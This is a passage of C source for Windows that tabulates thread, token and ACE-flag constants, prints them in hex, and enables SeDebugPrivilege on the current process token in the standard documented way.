"THREAD_TERMINATE",THREAD_TERMINATE,
"THREAD_SUSPEND_RESUME",THREAD_SUSPEND_RESUME,
"THREAD_GET_CONTEXT",THREAD_GET_CONTEXT,
"THREAD_SET_CONTEXT",THREAD_SET_CONTEXT,
"THREAD_SET_INFORMATION",THREAD_SET_INFORMATION,
"THREAD_QUERY_INFORMATION",THREAD_QUERY_INFORMATION,
"THREAD_SET_THREAD_TOKEN",THREAD_SET_THREAD_TOKEN,
"THREAD_IMPERSONATE",THREAD_IMPERSONATE,
"THREAD_DIRECT_IMPERSONATION",THREAD_DIRECT_IMPERSONATION,
"------------- Token access masks -------------------------",0,
"TOKEN_ALL_ACCESS",TOKEN_ALL_ACCESS,
"TOKEN_EXECUTE",TOKEN_EXECUTE,
"TOKEN_WRITE",TOKEN_WRITE,
"TOKEN_READ",TOKEN_READ,
"TOKEN_ASSIGN_PRIMARY",TOKEN_ASSIGN_PRIMARY,
"TOKEN_DUPLICATE",TOKEN_DUPLICATE,
"TOKEN_IMPERSONATE",TOKEN_IMPERSONATE,
"TOKEN_QUERY",TOKEN_QUERY,
"TOKEN_QUERY_SOURCE",TOKEN_QUERY_SOURCE,
"TOKEN_ADJUST_PRIVILEGES",TOKEN_ADJUST_PRIVILEGES,
"TOKEN_ADJUST_GROUPS",TOKEN_ADJUST_GROUPS,
"TOKEN_ADJUST_DEFAULT",TOKEN_ADJUST_DEFAULT,
"TOKEN_ADJUST_SESSIONID",TOKEN_ADJUST_SESSIONID,
"------------- ACE Flags ----------------------------------",0,
"OBJECT_INHERIT_ACE",OBJECT_INHERIT_ACE,
"CONTAINER_INHERIT_ACE",CONTAINER_INHERIT_ACE,
"NO_PROPAGATE_INHERIT_ACE",NO_PROPAGATE_INHERIT_ACE,
"INHERIT_ONLY_ACE",INHERIT_ONLY_ACE,
"INHERITED_ACE",INHERITED_ACE,
"VALID_INHERIT_FLAGS",VALID_INHERIT_FLAGS,
};

void listAllConstants()
{
    int i;
    for( i = 0; i < sizeof(gNameValueAry)/sizeof(gNameValueAry[0]); i++ )
    {
        if( gNameValueAry[i].szName[0] != '-' )
        {
            printf( "%-30s 0x%08x\n", gNameValueAry[i].szName, gNameValueAry[i].iValue );
        }
        else{
            printf( "%s\n", gNameValueAry[i].szName );
        }
    }
}

BOOL EnableOpenAllProcessPrivilege() 
{
    BOOL bSuccess = FALSE;
    HANDLE hToken;
    static bPrivilegeInited = FALSE;
    static bPrivilegeSetOK = FALSE;
    if( bPrivilegeInited ){
        return bPrivilegeSetOK;
    }

    if( OpenProcessToken( GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken ) )
    {
        TOKEN_PRIVILEGES tp;
        LUID luid;

        if( LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luid ) )
        {
            tp.PrivilegeCount = 1;
            tp.Privileges[0].Luid = luid;
            tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

            if( AdjustTokenPrivileges( hToken, FALSE, &tp, sizeof(tp), NULL, NULL )
                && GetLastError() == ERROR_SUCCESS )
            { 
                bSuccess = TRUE;
            }
        }

        pusherr;
        CloseHandle(hToken);
        poperr;
    }
    bPrivilegeSetOK = bSuccess;
    return bSuccess;
}
